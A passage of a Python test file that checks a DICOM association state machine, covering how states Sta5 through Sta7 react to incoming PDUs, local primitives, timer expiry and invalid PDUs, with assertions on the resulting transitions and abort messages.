self.move_to_state(self.assoc, scp)
self.assoc.dul.send_pdu(self.get_pdata())
scp.step()
scp.shutdown()
assert self.fsm._changes[:2] == [
('Sta1', 'Evt1', 'AE-1'),
('Sta4', 'Evt2', 'AE-2'),
]
assert self.fsm._transitions[:2] == ['Sta4', 'Sta5']
assert self.fsm._events[:3] == ['Evt1', 'Evt2', 'Evt9']
def test_evt10(self):
"""Test Sta5 + Evt10."""
# Sta5 + Evt10 -> AA-8 -> Sta13
# Evt10: Receive P-DATA-TF PDU from <remote>
# AA-8: Send A-ABORT PDU, issue A-P-ABORT primitive, start ARTIM
commands = [
('recv', None),
('send', p_data_tf),
('recv', None),
('exit', None)
]
self.scp = scp = self.start_server(commands)
self.move_to_state(self.assoc, scp)
scp.step()
scp.step()
scp.step()
scp.shutdown()
assert self.fsm._changes[:3] == [
('Sta1', 'Evt1', 'AE-1'),
('Sta4', 'Evt2', 'AE-2'),
('Sta5', 'Evt10', 'AA-8'),
]
assert self.fsm._transitions[:3] == ['Sta4', 'Sta5', 'Sta13']
assert self.fsm._events[:3] == ['Evt1', 'Evt2', 'Evt10']
# Issue A-ABORT PDU
assert scp.handlers[0].received[1] == (
b'\x07\x00\x00\x00\x00\x04\x00\x00\x02\x00'
)
def test_evt11(self):
"""Test Sta5 + Evt11."""
# Sta5 + Evt11 -> <ignore> -> Sta5
# Evt11: Receive A-RELEASE (rq) primitive from <local user>
commands = [
('recv', None),
('exit', None)
]
self.scp = scp = self.start_server(commands)
self.move_to_state(self.assoc, scp)
self.assoc.dul.send_pdu(self.get_release(False))
scp.step()
scp.shutdown()
assert self.fsm._changes[:2] == [
('Sta1', 'Evt1', 'AE-1'),
('Sta4', 'Evt2', 'AE-2'),
]
assert self.fsm._transitions[:2] == ['Sta4', 'Sta5']
assert self.fsm._events[:3] == ['Evt1', 'Evt2', 'Evt11']
def test_evt12(self):
"""Test Sta5 + Evt12."""
# Sta5 + Evt12 -> AA-8 -> Sta13
# Evt12: Receive A-RELEASE-RQ PDU from <remote>
# AA-8: Send A-ABORT PDU, issue A-P-ABORT primitive, start ARTIM
commands = [
('recv', None),
('send', a_release_rq),
('recv', None),
('exit', None)
]
self.scp = scp = self.start_server(commands)
self.move_to_state(self.assoc, scp)
scp.step()
scp.step()
scp.step()
scp.shutdown()
assert self.fsm._changes[:3] == [
('Sta1', 'Evt1', 'AE-1'),
('Sta4', 'Evt2', 'AE-2'),
('Sta5', 'Evt12', 'AA-8'),
]
assert self.fsm._transitions[:3] == ['Sta4', 'Sta5', 'Sta13']
assert self.fsm._events[:3] == ['Evt1', 'Evt2', 'Evt12']
# Issue A-ABORT PDU
assert scp.handlers[0].received[1] == (
b'\x07\x00\x00\x00\x00\x04\x00\x00\x02\x00'
)
def test_evt13(self):
"""Test Sta5 + Evt13."""
# Sta5 + Evt13 -> AA-8 -> Sta13
# Evt13: Receive A-RELEASE-RP PDU from <remote>
# AA-8: Send A-ABORT PDU, issue A-P-ABORT primitive, start ARTIM
commands = [
('recv', None),
('send', a_release_rp),
('recv', None),
('exit', None)
]
self.scp = scp = self.start_server(commands)
self.move_to_state(self.assoc, scp)
scp.step()
scp.step()
scp.step()
scp.shutdown()
assert self.fsm._changes[:3] == [
('Sta1', 'Evt1', 'AE-1'),
('Sta4', 'Evt2', 'AE-2'),
('Sta5', 'Evt13', 'AA-8'),
]
assert self.fsm._transitions[:3] == ['Sta4', 'Sta5', 'Sta13']
assert self.fsm._events[:3] == ['Evt1', 'Evt2', 'Evt13']
# Issue A-ABORT PDU
assert scp.handlers[0].received[1] == (
b'\x07\x00\x00\x00\x00\x04\x00\x00\x02\x00'
)
def test_evt14(self):
"""Test Sta5 + Evt14."""
# Sta5 + Evt14 -> <ignore> -> Sta5
# Evt14: Receive A-RELEASE (rsp) primitive from <local user>
commands = [
('recv', None),
('exit', None)
]
self.scp = scp = self.start_server(commands)
self.move_to_state(self.assoc, scp)
self.assoc.dul.send_pdu(self.get_release(True))
scp.step()
scp.shutdown()
assert self.fsm._changes[:2] == [
('Sta1', 'Evt1', 'AE-1'),
('Sta4', 'Evt2', 'AE-2'),
]
assert self.fsm._transitions[:2] == ['Sta4', 'Sta5']
assert self.fsm._events[:3] == ['Evt1', 'Evt2', 'Evt14']
def test_evt15(self):
"""Test Sta5 + Evt15."""
# Sta5 + Evt15 -> AA-1 -> Sta13
# Evt15: Receive A-ABORT (rq) primitive from <local user>
# AA-1: Send A-ABORT PDU and restart ARTIM
commands = [
('recv', None),
('recv', None),
('exit', None)
]
self.scp = scp = self.start_server(commands)
self.move_to_state(self.assoc, scp)
self.assoc.dul.send_pdu(self.get_abort())
scp.step()
scp.step()
scp.shutdown()
assert self.fsm._changes[:3] == [
('Sta1', 'Evt1', 'AE-1'),
('Sta4', 'Evt2', 'AE-2'),
('Sta5', 'Evt15', 'AA-1'),
]
assert self.fsm._transitions[:3] == ['Sta4', 'Sta5', 'Sta13']
assert self.fsm._events[:3] == ['Evt1', 'Evt2', 'Evt15']
# Issue A-ABORT PDU
assert scp.handlers[0].received[1] == (
b'\x07\x00\x00\x00\x00\x04\x00\x00\x00\x00'
)
def test_evt16(self):
"""Test Sta5 + Evt16."""
# Sta5 + Evt16 -> AA-3 -> Sta1
# Evt16: Receive A-ABORT PDU from <remote>
# AA-3: If service user initiated:
# Issue A-ABORT primitve and close transport
# Otherwise
# Issue A-P-ABORT primitive and close transport
commands = [
('recv', None),
('send', a_abort),
('exit', None)
]
self.scp = scp = self.start_server(commands)
self.move_to_state(self.assoc, scp)
scp.step()
scp.step()
scp.shutdown()
assert self.fsm._changes[:3] == [
('Sta1', 'Evt1', 'AE-1'),
('Sta4', 'Evt2', 'AE-2'),
('Sta5', 'Evt16', 'AA-3'),
]
assert self.fsm._transitions[:3] == ['Sta4', 'Sta5', 'Sta1']
assert self.fsm._events[:3] == ['Evt1', 'Evt2', 'Evt16']
def test_evt17(self):
"""Test Sta5 + Evt17."""
# Sta1 + Evt17 -> AA-4 -> Sta1
# Evt17: Receive TRANSPORT_CLOSED from <transport service>
# AA-4: Issue A-P-ABORT primitive
commands = [
('recv', None),
('exit', None)
]
self.scp = scp = self.start_server(commands)
self.move_to_state(self.assoc, scp)
scp.step()
scp.shutdown()
time.sleep(0.5)
assert self.fsm._changes[:3] == [
('Sta1', 'Evt1', 'AE-1'),
('Sta4', 'Evt2', 'AE-2'),
('Sta5', 'Evt17', 'AA-4'),
]
assert self.fsm._transitions[:3] == ['Sta4', 'Sta5', 'Sta1']
assert self.fsm._events[:3] == ['Evt1', 'Evt2', 'Evt17']
def test_evt18(self):
"""Test Sta5 + Evt18."""
# Sta5 + Evt18 -> <ignore> -> Sta5
# Evt18: ARTIM timer expired from <local service>
commands = [
('recv', None),
('exit', None)
]
self.scp = scp = self.start_server(commands)
self.move_to_state(self.assoc, scp)
self.assoc.dul.artim_timer.timeout = 0.05
self.assoc.dul.artim_timer.start()
time.sleep(0.5)
scp.step()
scp.shutdown()
assert self.fsm._changes[:3] == [
('Sta1', 'Evt1', 'AE-1'),
('Sta4', 'Evt2', 'AE-2'),
]
assert self.fsm._transitions[:3] == ['Sta4', 'Sta5']
assert self.fsm._events[:3] == ['Evt1', 'Evt2', 'Evt18']
def test_evt19(self):
"""Test Sta5 + Evt19."""
# Sta5 + Evt19 -> AA-8 -> Sta13
# Evt19: Received unrecognised or invalid PDU from <remote>
# AA-8: Send A-ABORT PDU, issue A-P-ABORT primitive, start ARTIM
commands = [
('recv', None),
('send', b'\x08\x00\x00\x00\x00\x00'),
('recv', None),
('exit', None)
]
self.scp = scp = self.start_server(commands)
self.move_to_state(self.assoc, scp)
scp.step()
scp.step()
scp.step()
scp.shutdown()
assert self.fsm._changes[:3] == [
('Sta1', 'Evt1', 'AE-1'),
('Sta4', 'Evt2', 'AE-2'),
('Sta5', 'Evt19', 'AA-8'),
]
assert self.fsm._transitions[:3] == ['Sta4', 'Sta5', 'Sta13']
assert self.fsm._events[:3] == ['Evt1', 'Evt2', 'Evt19']
# Issue A-ABORT PDU
assert scp.handlers[0].received[1] == (
b'\x07\x00\x00\x00\x00\x04\x00\x00\x02\x00'
)
@pytest.mark.filterwarnings("ignore:.*:pytest.PytestUnhandledThreadExceptionWarning")
class TestState06(TestStateBase):
"""Tests for State 06: Association established and ready for data."""
def move_to_state(self, assoc, scp):
assoc.start()
scp.step()
scp.step()
self.wait_on_state(assoc.dul.state_machine, 'Sta6')
def test_evt01(self):
"""Test Sta6 + Evt1."""
# Sta6 + Evt1 -> <ignore> -> Sta6
# Evt1: A-ASSOCIATE (rq) primitive from <local user>
commands = [
('recv', None),
('send', a_associate_ac),
('exit', None)
]
self.scp = scp = self.start_server(commands)
self.move_to_state(self.assoc, scp)
self.assoc.dul.send_pdu(self.get_associate('request'))
scp.step()
scp.shutdown()
assert self.fsm._changes[:3] == [
('Sta1', 'Evt1', 'AE-1'),
('Sta4', 'Evt2', 'AE-2'),
('Sta5', 'Evt3', 'AE-3'),
]
assert self.fsm._transitions[:3] == ['Sta4', 'Sta5', 'Sta6']
assert self.fsm._events[:4] == ['Evt1', 'Evt2', 'Evt3', 'Evt1']
@pytest.mark.skip()
def test_evt02(self):
"""Test Sta6 + Evt2."""
# Sta6 + Evt2 -> <ignore> -> Sta6
# Evt2: Receive TRANSPORT_OPEN from <transport service>
pass
def test_evt03(self):
"""Test Sta6 + Evt3."""
# Sta6 + Evt3 -> AA-8 -> Sta13
# Evt3: Receive A-ASSOCIATE-AC PDU from <remote>
# AA-8: Send A-ABORT PDU, issue A-P-ABORT primitive, start ARTIM
commands = [
('recv', None),
('send', a_associate_ac),
('send', a_associate_ac),
('recv', None),
('exit', None)
]
self.scp = scp = self.start_server(commands)
self.move_to_state(self.assoc, scp)
scp.step()
scp.step()
scp.step()
scp.shutdown()
assert self.fsm._changes[:4] == [
('Sta1', 'Evt1', 'AE-1'),
('Sta4', 'Evt2', 'AE-2'),
('Sta5', 'Evt3', 'AE-3'),
('Sta6', 'Evt3', 'AA-8'),
]
assert self.fsm._transitions[:4] == ['Sta4', 'Sta5', 'Sta6', 'Sta13']
assert self.fsm._events[:4] == ['Evt1', 'Evt2', 'Evt3', 'Evt3']
# Issue A-ABORT PDU
assert scp.handlers[0].received[1] == (
b'\x07\x00\x00\x00\x00\x04\x00\x00\x02\x00'
)
def test_evt04(self):
"""Test Sta6 + Evt4."""
# Sta6 + Evt4 -> AA-8 -> Sta13
# Evt4: Receive A-ASSOCIATE-RJ PDU from <remote>
# AA-8: Send A-ABORT PDU, issue A-P-ABORT primitive, start ARTIM
commands = [
('recv', None),
('send', a_associate_ac),
('send', a_associate_rj),
('recv', None),
('exit', None)
]
self.scp = scp = self.start_server(commands)
self.move_to_state(self.assoc, scp)
scp.step()
scp.step()
scp.step()
scp.shutdown()
assert self.fsm._changes[:4] == [
('Sta1', 'Evt1', 'AE-1'),
('Sta4', 'Evt2', 'AE-2'),
('Sta5', 'Evt3', 'AE-3'),
('Sta6', 'Evt4', 'AA-8'),
]
assert self.fsm._transitions[:4] == ['Sta4', 'Sta5', 'Sta6', 'Sta13']
assert self.fsm._events[:4] == ['Evt1', 'Evt2', 'Evt3', 'Evt4']
# Issue A-ABORT PDU
assert scp.handlers[0].received[1] == (
b'\x07\x00\x00\x00\x00\x04\x00\x00\x02\x00'
)
@pytest.mark.skip()
def test_evt05(self):
"""Test Sta6 + Evt5."""
# Sta6 + Evt5 -> <ignore> -> Sta6
# Evt5: Receive TRANSPORT_INDICATION from <transport service>
pass
def test_evt06(self):
"""Test Sta6 + Evt6."""
# Sta6 + Evt6 -> AA-8 -> Sta13
# Evt6: Receive A-ASSOCIATE-RQ PDU from <remote>
# AA-8: Send A-ABORT PDU, issue A-P-ABORT primitive, start ARTIM
commands = [
('recv', None),
('send', a_associate_ac),
('send', a_associate_rq),
('recv', None),
('exit', None)
]
self.scp = scp = self.start_server(commands)
self.move_to_state(self.assoc, scp)
scp.step()
scp.step()
scp.step()
scp.shutdown()
assert self.fsm._changes[:4] == [
('Sta1', 'Evt1', 'AE-1'),
('Sta4', 'Evt2', 'AE-2'),
('Sta5', 'Evt3', 'AE-3'),
('Sta6', 'Evt6', 'AA-8'),
]
assert self.fsm._transitions[:4] == ['Sta4', 'Sta5', 'Sta6', 'Sta13']
assert self.fsm._events[:4] == ['Evt1', 'Evt2', 'Evt3', 'Evt6']
# Issue A-ABORT PDU
assert scp.handlers[0].received[1] == (
b'\x07\x00\x00\x00\x00\x04\x00\x00\x02\x00'
)
def test_evt07(self):
"""Test Sta6 + Evt7."""
# Sta6 + Evt7 -> <ignore> -> Sta6
# Evt7: Receive A-ASSOCIATE (accept) primitive from <local user>
commands = [
('recv', None),
('send', a_associate_ac),
('exit', None)
]
self.scp = scp = self.start_server(commands)
self.move_to_state(self.assoc, scp)
self.assoc.dul.send_pdu(self.get_associate('accept'))
scp.step()
scp.shutdown()
assert self.fsm._changes[:3] == [
('Sta1', 'Evt1', 'AE-1'),
('Sta4', 'Evt2', 'AE-2'),
('Sta5', 'Evt3', 'AE-3'),
]
assert self.fsm._transitions[:3] == ['Sta4', 'Sta5', 'Sta6']
assert self.fsm._events[:4] == ['Evt1', 'Evt2', 'Evt3', 'Evt7']
def test_evt08(self):
"""Test Sta6 + Evt8."""
# Sta6 + Evt8 -> <ignore> -> Sta6
# Evt8: Receive A-ASSOCIATE (reject) primitive from <local user>
commands = [
('recv', None),
('send', a_associate_ac),
('exit', None)
]
self.scp = scp = self.start_server(commands)
self.move_to_state(self.assoc, scp)
self.assoc.dul.send_pdu(self.get_associate('reject'))
scp.step()
scp.shutdown()
assert self.fsm._changes[:3] == [
('Sta1', 'Evt1', 'AE-1'),
('Sta4', 'Evt2', 'AE-2'),
('Sta5', 'Evt3', 'AE-3'),
]
assert self.fsm._transitions[:3] == ['Sta4', 'Sta5', 'Sta6']
assert self.fsm._events[:4] == ['Evt1', 'Evt2', 'Evt3', 'Evt8']
def test_evt09(self):
"""Test Sta6 + Evt9."""
# Sta6 + Evt9 -> DT-1 -> Sta6
# Evt9: Receive P-DATA primitive from <local user>
# DT-1: Send P-DATA-TD PDU
commands = [
('recv', None),
('send', a_associate_ac),
('exit', None)
]
self.scp = scp = self.start_server(commands)
self.move_to_state(self.assoc, scp)
self.assoc.dul.send_pdu(self.get_pdata())
scp.step()
scp.shutdown()
assert self.fsm._changes[:4] == [
('Sta1', 'Evt1', 'AE-1'),
('Sta4', 'Evt2', 'AE-2'),
('Sta5', 'Evt3', 'AE-3'),
('Sta6', 'Evt9', 'DT-1'),
]
assert self.fsm._transitions[:4] == ['Sta4', 'Sta5', 'Sta6', 'Sta6']
assert self.fsm._events[:4] == ['Evt1', 'Evt2', 'Evt3', 'Evt9']
def test_evt10(self):
"""Test Sta6 + Evt10."""
# Sta6 + Evt10 -> DT-2 -> Sta6
# Evt10: Receive P-DATA-TF PDU from <remote>
# DT-2: Send P-DATA primitive
commands = [
('recv', None),
('send', a_associate_ac),
('send', p_data_tf),
('exit', None)
]
self.scp = scp = self.start_server(commands)
self.move_to_state(self.assoc, scp)
scp.step()
scp.step()
scp.shutdown()
assert self.fsm._changes[:4] == [
('Sta1', 'Evt1', 'AE-1'),
('Sta4', 'Evt2', 'AE-2'),
('Sta5', 'Evt3', 'AE-3'),
('Sta6', 'Evt10', 'DT-2'),
]
assert self.fsm._transitions[:4] == ['Sta4', 'Sta5', 'Sta6', 'Sta6']
assert self.fsm._events[:4] == ['Evt1', 'Evt2', 'Evt3', 'Evt10']
def test_evt11(self):
"""Test Sta6 + Evt11."""
# Sta6 + Evt11 -> AR-1 -> Sta7
# Evt11: Receive A-RELEASE (rq) primitive from <local user>
commands = [
('recv', None),
('send', a_associate_ac),
('exit', None)
]
self.scp = scp = self.start_server(commands)
self.move_to_state(self.assoc, scp)
self.assoc.dul.send_pdu(self.get_release(False))
scp.step()
scp.shutdown()
assert self.fsm._changes[:3] == [
('Sta1', 'Evt1', 'AE-1'),
('Sta4', 'Evt2', 'AE-2'),
('Sta5', 'Evt3', 'AE-3'),
]
assert self.fsm._transitions[:3] == ['Sta4', 'Sta5', 'Sta6']
assert self.fsm._events[:4] == ['Evt1', 'Evt2', 'Evt3', 'Evt11']
def test_evt12(self):
"""Test Sta6 + Evt12."""
# Sta6 + Evt12 -> AR-2 -> Sta8
# Evt12: Receive A-RELEASE-RQ PDU from <remote>
# AR-2: Issue A-RELEASE (rq) primitive
commands = [
('recv', None),
('send', a_associate_ac),
('send', a_release_rq),
('exit', None)
]
self.scp = scp = self.start_server(commands)
self.move_to_state(self.assoc, scp)
scp.step()
scp.step()
scp.shutdown()
assert self.fsm._changes[:4] == [
('Sta1', 'Evt1', 'AE-1'),
('Sta4', 'Evt2', 'AE-2'),
('Sta5', 'Evt3', 'AE-3'),
('Sta6', 'Evt12', 'AR-2'),
]
assert self.fsm._transitions[:4] == ['Sta4', 'Sta5', 'Sta6', 'Sta8']
assert self.fsm._events[:4] == ['Evt1', 'Evt2', 'Evt3', 'Evt12']
def test_evt13(self):
"""Test Sta6 + Evt13."""
# Sta6 + Evt13 -> AA-8 -> Sta13
# Evt13: Receive A-RELEASE-RP PDU from <remote>
# AA-8: Send A-ABORT PDU, issue A-P-ABORT primitive, start ARTIM
commands = [
('recv', None),
('send', a_associate_ac),
('send', a_release_rp),
('recv', None),
('exit', None)
]
self.scp = scp = self.start_server(commands)
self.move_to_state(self.assoc, scp)
scp.step()
scp.step()
scp.step()
scp.shutdown()
assert self.fsm._changes[:4] == [
('Sta1', 'Evt1', 'AE-1'),
('Sta4', 'Evt2', 'AE-2'),
('Sta5', 'Evt3', 'AE-3'),
('Sta6', 'Evt13', 'AA-8'),
]
assert self.fsm._transitions[:4] == ['Sta4', 'Sta5', 'Sta6', 'Sta13']
assert self.fsm._events[:4] == ['Evt1', 'Evt2', 'Evt3', 'Evt13']
# Issue A-ABORT PDU
assert scp.handlers[0].received[1] == (
b'\x07\x00\x00\x00\x00\x04\x00\x00\x02\x00'
)
def test_evt14(self):
"""Test Sta6 + Evt14."""
# Sta6 + Evt14 -> <ignore> -> Sta6
# Evt14: Receive A-RELEASE (rsp) primitive from <local user>
commands = [
('recv', None),
('send', a_associate_ac),
('exit', None)
]
self.scp = scp = self.start_server(commands)
self.move_to_state(self.assoc, scp)
self.assoc.dul.send_pdu(self.get_release(True))
scp.step()
scp.shutdown()
assert self.fsm._changes[:3] == [
('Sta1', 'Evt1', 'AE-1'),
('Sta4', 'Evt2', 'AE-2'),
('Sta5', 'Evt3', 'AE-3'),
]
assert self.fsm._transitions[:3] == ['Sta4', 'Sta5', 'Sta6']
assert self.fsm._events[:4] == ['Evt1', 'Evt2', 'Evt3', 'Evt14']
def test_evt15(self):
"""Test Sta6 + Evt15."""
# Sta6 + Evt15 -> AA-1 -> Sta13
# Evt15: Receive A-ABORT (rq) primitive from <local user>
# AA-1: Send A-ABORT PDU and start ARTIM
commands = [
('recv', None),
('send', a_associate_ac),
('recv', None),
('exit', None)
]
self.scp = scp = self.start_server(commands)
self.move_to_state(self.assoc, scp)
self.assoc.abort()
scp.step()
scp.step()
scp.shutdown()
assert self.fsm._changes[:4] == [
('Sta1', 'Evt1', 'AE-1'),
('Sta4', 'Evt2', 'AE-2'),
('Sta5', 'Evt3', 'AE-3'),
('Sta6', 'Evt15', 'AA-1'),
]
assert self.fsm._transitions[:3] == ['Sta4', 'Sta5', 'Sta6']
assert self.fsm._events[:4] == ['Evt1', 'Evt2', 'Evt3', 'Evt15']
# Issue A-ABORT PDU
assert scp.handlers[0].received[1] == (
b'\x07\x00\x00\x00\x00\x04\x00\x00\x00\x00'
)
def test_evt16(self):
"""Test Sta6 + Evt16."""
# Sta6 + Evt16 -> AA-3 -> Sta1
# Evt16: Receive A-ABORT PDU from <remote>
# AA-3: Issue A-ABORT or A-P-ABORT, and close connection
commands = [
('recv', None),
('send', a_associate_ac),
('send', a_abort),
('exit', None)
]
self.scp = scp = self.start_server(commands)
self.move_to_state(self.assoc, scp)
scp.step()
scp.step()
scp.shutdown()
assert self.fsm._changes[:4] == [
('Sta1', 'Evt1', 'AE-1'),
('Sta4', 'Evt2', 'AE-2'),
('Sta5', 'Evt3', 'AE-3'),
('Sta6', 'Evt16', 'AA-3'),
]
assert self.fsm._transitions[:4] == ['Sta4', 'Sta5', 'Sta6', 'Sta1']
assert self.fsm._events[:4] == ['Evt1', 'Evt2', 'Evt3', 'Evt16']
def test_evt17(self):
"""Test Sta6 + Evt17."""
# Sta6 + Evt17 -> AA-4 -> Sta1
# Evt17: Receive TRANSPORT_CLOSED from <transport service>
# AA-4: Issue A-P-ABORT primitive
commands = [
('recv', None),
('send', a_associate_ac),
('exit', None)
]
self.scp = scp = self.start_server(commands)
self.move_to_state(self.assoc, scp)
scp.step()
scp.shutdown()
time.sleep(0.5)
assert self.fsm._changes[:4] == [
('Sta1', 'Evt1', 'AE-1'),
('Sta4', 'Evt2', 'AE-2'),
('Sta5', 'Evt3', 'AE-3'),
('Sta6', 'Evt17', 'AA-4'),
]
assert self.fsm._transitions[:4] == ['Sta4', 'Sta5', 'Sta6', 'Sta1']
assert self.fsm._events[:4] == ['Evt1', 'Evt2', 'Evt3', 'Evt17']
def test_evt18(self):
"""Test Sta6 + Evt18."""
# Sta6 + Evt18 -> <ignore> -> Sta6
# Evt18: ARTIM timer expired from <local service>
commands = [
('recv', None),
('send', a_associate_ac),
('exit', None)
]
self.scp = scp = self.start_server(commands)
self.move_to_state(self.assoc, scp)
self.assoc.dul.artim_timer.timeout = 0.05
self.assoc.dul.artim_timer.start()
time.sleep(0.5)
scp.step()
scp.shutdown()
assert self.fsm._changes[:3] == [
('Sta1', 'Evt1', 'AE-1'),
('Sta4', 'Evt2', 'AE-2'),
('Sta5', 'Evt3', 'AE-3'),
]
assert self.fsm._transitions[:3] == ['Sta4', 'Sta5', 'Sta6']
assert self.fsm._events[:4] == ['Evt1', 'Evt2', 'Evt3', 'Evt18']
def test_evt19(self):
"""Test Sta6 + Evt19."""
# Sta6 + Evt19 -> AA-8 -> Sta13
# Evt19: Received unrecognised or invalid PDU from <remote>
# AA-8: Send A-ABORT PDU, issue A-P-ABORT primitive, start ARTIM
commands = [
('recv', None),
('send', a_associate_ac),
('send', b'\x08\x00\x00\x00\x00\x00'),
('recv', None),
('exit', None)
]
self.scp = scp = self.start_server(commands)
self.move_to_state(self.assoc, scp)
scp.step()
scp.step()
scp.step()
scp.shutdown()
assert self.fsm._changes[:4] == [
('Sta1', 'Evt1', 'AE-1'),
('Sta4', 'Evt2', 'AE-2'),
('Sta5', 'Evt3', 'AE-3'),
('Sta6', 'Evt19', 'AA-8'),
]
assert self.fsm._transitions[:4] == ['Sta4', 'Sta5', 'Sta6', 'Sta13']
assert self.fsm._events[:4] == ['Evt1', 'Evt2', 'Evt3', 'Evt19']
# Issue A-ABORT PDU
assert scp.handlers[0].received[1] == (
b'\x07\x00\x00\x00\x00\x04\x00\x00\x02\x00'
)
@pytest.mark.filterwarnings("ignore:.*:pytest.PytestUnhandledThreadExceptionWarning")
class TestState07(TestStateBase):
"""Tests for State 07: Awaiting A-RELEASE-RP PDU."""
def move_to_state(self, assoc, scp):
assoc.start()
scp.step()
scp.step()
self.wait_on_state(assoc.dul.state_machine, 'Sta6')
self.assoc.dul.send_pdu(self.get_release(False))
scp.step()
self.wait_on_state(assoc.dul.state_machine, 'Sta7')
def test_evt01(self):
"""Test Sta7 + Evt1."""
# Sta7 + Evt1 -> <ignore> -> Sta7
# Evt1: A-ASSOCIATE (rq) primitive from <local user>
commands = [
('recv', None),
('send', a_associate_ac),
('recv', None),
('exit', None),
]
self.scp = scp = self.start_server(commands)
self.move_to_state(self.assoc, scp)
self.assoc.dul.send_pdu(self.get_associate('request'))
scp.step()
scp.shutdown()
assert self.fsm._changes[:4] == [
('Sta1', 'Evt1', 'AE-1'),
('Sta4', 'Evt2', 'AE-2'),
('Sta5', 'Evt3', 'AE-3'),
('Sta6', 'Evt11', 'AR-1'),
]
assert self.fsm._transitions[:4] == ['Sta4', 'Sta5', 'Sta6', 'Sta7']
assert self.fsm._events[:5] == ['Evt1', 'Evt2', 'Evt3', 'Evt11', 'Evt1']
@pytest.mark.skip()
def test_evt02(self):
"""Test Sta7 + Evt2."""
# Sta7 + Evt2 -> <ignore> -> Sta7
# Evt2: Receive TRANSPORT_OPEN from <transport service>
pass
def test_evt03(self):
"""Test Sta7 + Evt3."""
# Sta7 + Evt3 -> AA-8 -> Sta13
# Evt3: Receive A-ASSOCIATE-AC PDU from <remote>
# AA-8: Send A-ABORT PDU, issue A-P-ABORT primitive, start ARTIM
commands = [
('recv', None),
('send', a_associate_ac),
('recv', None),
('send', a_associate_ac),
('recv', None),
('exit', None),
]
self.scp = scp = self.start_server(commands)
self.move_to_state(self.assoc, scp)
scp.step()
scp.step()
scp.step()
scp.shutdown()
assert self.fsm._changes[:5] == [
('Sta1', 'Evt1', 'AE-1'),
('Sta4', 'Evt2', 'AE-2'),
('Sta5', 'Evt3', 'AE-3'),
('Sta6', 'Evt11', 'AR-1'),
('Sta7', 'Evt3', 'AA-8'),
]
assert self.fsm._transitions[:4] == ['Sta4', 'Sta5', 'Sta6', 'Sta7']
assert self.fsm._events[:5] == ['Evt1', 'Evt2', 'Evt3', 'Evt11', 'Evt3']
# Issue A-ASSOCIATE, A-RELEASE, A-ABORT PDU
assert scp.handlers[0].received[2] == (
b'\x07\x00\x00\x00\x00\x04\x00\x00\x02\x00'
)
def test_evt04(self):
"""Test Sta7 + Evt4."""
# Sta7 + Evt4 -> AA-8 -> Sta13
# Evt4: Receive A-ASSOCIATE-RJ PDU from <remote>
# AA-8: Send A-ABORT PDU, issue A-P-ABORT primitive, start ARTIM
commands = [
('recv', None),
('send', a_associate_ac),
('recv', None),
('send', a_associate_rj),
('recv', None),
('exit', None),
]
self.scp = scp = self.start_server(commands)
self.move_to_state(self.assoc, scp)
scp.step()
scp.step()
scp.step()
scp.shutdown()
assert self.fsm._changes[:5] == [
('Sta1', 'Evt1', 'AE-1'),
('Sta4', 'Evt2', 'AE-2'),
('Sta5', 'Evt3', 'AE-3'),
('Sta6', 'Evt11', 'AR-1'),
('Sta7', 'Evt4', 'AA-8'),
]
assert self.fsm._transitions[:4] == ['Sta4', 'Sta5', 'Sta6', 'Sta7']
assert self.fsm._events[:5] == ['Evt1', 'Evt2', 'Evt3', 'Evt11', 'Evt4']
# Issue A-ASSOCIATE, A-RELEASE, A-ABORT PDU
assert scp.handlers[0].received[2] == (
b'\x07\x00\x00\x00\x00\x04\x00\x00\x02\x00'
)
@pytest.mark.skip()
def test_evt05(self):
"""Test Sta7 + Evt5."""
# Sta7 + Evt5 -> <ignore> -> Sta7
# Evt5: Receive TRANSPORT_INDICATION from <transport service>
pass
def test_evt06(self):
"""Test Sta7 + Evt6."""
# Sta7 + Evt6 -> AA-8 -> Sta13
# Evt6: Receive A-ASSOCIATE-RQ PDU from <remote>
# AA-8: Send A-ABORT PDU, issue A-P-ABORT primitive, start ARTIM
commands = [
('recv', None),
('send', a_associate_ac),
('recv', None),
('send', a_associate_rq),
('recv', None),
('exit', None),
]
self.scp = scp = self.start_server(commands)
self.move_to_state(self.assoc, scp)
scp.step()
scp.step()
scp.step()
scp.shutdown()
assert self.fsm._changes[:5] == [
('Sta1', 'Evt1', 'AE-1'),
('Sta4', 'Evt2', 'AE-2'),
('Sta5', 'Evt3', 'AE-3'),
('Sta6', 'Evt11', 'AR-1'),
('Sta7', 'Evt6', 'AA-8'),
]
assert self.fsm._transitions[:4] == ['Sta4', 'Sta5', 'Sta6', 'Sta7']
assert self.fsm._events[:5] == ['Evt1', 'Evt2', 'Evt3', 'Evt11', 'Evt6']
# Issue A-ASSOCIATE, A-RELEASE, A-ABORT PDU
assert scp.handlers[0].received[2] == (
b'\x07\x00\x00\x00\x00\x04\x00\x00\x02\x00'
)
def test_evt07(self):
"""Test Sta7 + Evt7."""
# Sta7 + Evt7 -> <ignore> -> Sta7
# Evt7: Receive A-ASSOCIATE (accept) primitive from <local user>
commands = [
('recv', None),
('send', a_associate_ac),
('recv', None),
('exit', None),
]
self.scp = scp = self.start_server(commands)
self.move_to_state(self.assoc, scp)
self.assoc.dul.send_pdu(self.get_associate('accept'))
scp.step()
scp.shutdown()
assert self.fsm._changes[:4] == [
('Sta1', 'Evt1', 'AE-1'),
('Sta4', 'Evt2', 'AE-2'),
('Sta5', 'Evt3', 'AE-3'),
('Sta6', 'Evt11', 'AR-1'),
]
assert self.fsm._transitions[:4] == ['Sta4', 'Sta5', 'Sta6', 'Sta7']
assert self.fsm._events[:5] == ['Evt1', 'Evt2', 'Evt3', 'Evt11', 'Evt7']
def test_evt08(self):
"""Test Sta7 + Evt8."""
# Sta7 + Evt8 -> <ignore> -> Sta7
# Evt8: Receive A-ASSOCIATE (reject) primitive from <local user>
commands = [
('recv', None),
('send', a_associate_ac),
('recv', None),
('exit', None),
]
self.scp = scp = self.start_server(commands)
self.move_to_state(self.assoc, scp)
self.assoc.dul.send_pdu(self.get_associate('reject'))
scp.step()
scp.shutdown()
assert self.fsm._changes[:4] == [
('Sta1', 'Evt1', 'AE-1'),
('Sta4', 'Evt2', 'AE-2'),
('Sta5', 'Evt3', 'AE-3'),
('Sta6', 'Evt11', 'AR-1'),
]
assert self.fsm._transitions[:4] == ['Sta4', 'Sta5', 'Sta6', 'Sta7']
assert self.fsm._events[:5] == ['Evt1', 'Evt2', 'Evt3', 'Evt11', 'Evt8']
def test_evt09(self):
"""Test Sta7 + Evt9."""
# Sta7 + Evt9 -> <ignore> -> Sta7
# Evt9: Receive P-DATA primitive from <local user>
commands = [
('recv', None),
('send', a_associate_ac),
('recv', None),
('exit', None),
]
